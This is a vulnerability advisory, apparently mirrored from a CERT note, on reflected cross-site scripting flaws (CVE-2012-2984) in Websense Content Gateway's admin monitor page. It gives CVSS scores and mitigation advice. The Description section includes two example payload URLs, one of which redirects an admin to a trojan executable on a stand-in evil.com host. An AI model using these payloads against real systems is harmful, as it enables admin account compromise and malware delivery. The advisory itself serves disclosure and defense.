Executive Summary



This Alert is flagged as TOP 25 Common Weakness Enumeration from CWE/SANS. For more information, you can read this.
Summary
Title Websense Content Gateway XSS vulnerabilities
Informations
Name VU#318779 First vendor Publication 2012-08-23
Vendor VU-CERT Last vendor Modification 2012-08-27
Severity (Vendor) N/A Revision M

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Cvss Base Score 4.3 Attack Range Network
Cvss Impact Score 2.9 Attack Complexity Medium
Cvss Expoit Score 8.6 Authentication None Required
Calculate full CVSS 2.0 Vectors scores

Detail

Vulnerability Note VU#318779

Websense Content Gateway XSS vulnerabilities

Original Release date: 23 Aug 2012 | Last revised: 27 Aug 2012

Overview

Websense Content Gateway contains XSS vulnerabilities.

Description

Websense Content Gateway contains the following post-authentication reflective XSS vulnerabilities within the menu and item parameter values in the /monitor/m_overview.ink webpage. The reflective XSS reported allows for information disclosure and arbitrary code execution that can lead to the compromise of the Websense administrator’s account, machine, or other sensitive information.


CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVE-2012-2984

XSS Examples:

    1) https://www.trusted.com:8081/monitor/m_overview.ink?mode=0&menu=</script><img%20src%3Dhttp%3A%2f%2fwww.evil.com%2fimages%2fcross_site.jpg>
    2) https://www.trusted.com:8081/monitor/m_overview.ink?mode=0&menu=</script><meta%20http-equiv%3D%22refresh%22%20content%3D%220%3BURL%3Dhttps%3A%2f%2fwww.evil.com%2ftrojan.exe%22>

Impact

An attacker with access to the Websense Content Gateway web interface or by tricking a logged in admin user to visit a specially crafted URL, a remote attacker can conduct a cross-site scripting attack, which could be used to result in information leakage, privilege escalation, and/or denial of service.

Solution

The vendor has reported that this vulnerability will be in addressed in version 7.7.3 which is scheduled to be released in December 2012.

Good security practices should be adopted to minimize the risk of compromise. Where possible, the administrator’s machine should be solely used for administration and segregated from Internet surfing, only whitelisted applications should be allowed to load from the administrator’s machine and the administrator should refrain from re-using the same login credentials for any other purposes.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
WebSenseUnknown25 Jun 201225 Jun 2012
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

GroupScoreVector
Base4.9AV:N/AC:M/Au:S/C:P/I:P/A:N
Temporal4.0E:POC/RL:U/RC:UC
Environmental1.1CDP:L/TD:L/CR:ND/IR:ND/AR:ND

References

  • http://cwe.mitre.org/data/definitions/79.html
  • https://www.websense.com/content/home.aspx

Credit

Thanks to Steven Sim Kok Leong for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

  • CVE IDs:CVE-2012-2984
  • Date Public:23 Aug 2012
  • Date First Published:23 Aug 2012
  • Date Last Updated:27 Aug 2012
  • Document Revision:12

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.


This product is provided subject to the Notification as indicated here: http://www.us-cert.gov/legal.html#notify

Original Source

Url : http://www.kb.cert.org/vuls/id/318779

CWE : Common Weakness Enumeration

% Id Name
100 % CWE-79 Failure to Preserve Web Page Structure ('Cross-site Scripting') (CWE/SANS Top 25)